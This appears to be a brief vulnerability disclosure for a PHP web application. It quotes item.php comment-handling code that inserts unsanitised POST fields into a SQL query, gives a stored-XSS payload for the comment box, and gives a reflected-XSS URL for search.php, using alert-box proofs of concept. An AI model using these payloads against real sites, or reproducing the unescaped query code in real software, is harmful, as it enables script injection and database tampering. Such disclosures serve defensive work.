'item.php' http://www.example.com/item.php?action=post
------------------------------
case 'add_comment':
    dbExec("INSERT INTO %sitem_comment (item_id, author_name, author_email, body) VALUES (%d, '%s', '%s', '%s')", DB_TABLE_PREFIX, $_POST['id'], $_POST['authorName'], $_POST['authorEmail'], $_POST['body']);
    header('Location: item.php?id=' . $_POST['id']);
    break;
case 'post':
------------------------------
Put the code below into the comment box. The comment body is stored exactly as submitted; the payload only fires if the page that later renders the comment outputs it without HTML encoding (that rendering code is not shown here).
"><script>alert(String.fromCharCode(88, 83, 83));</script>

'search.php' http://www.example.com/search.php?pattern=<script>alert(String.fromCharCode(88, 83, 83));</script>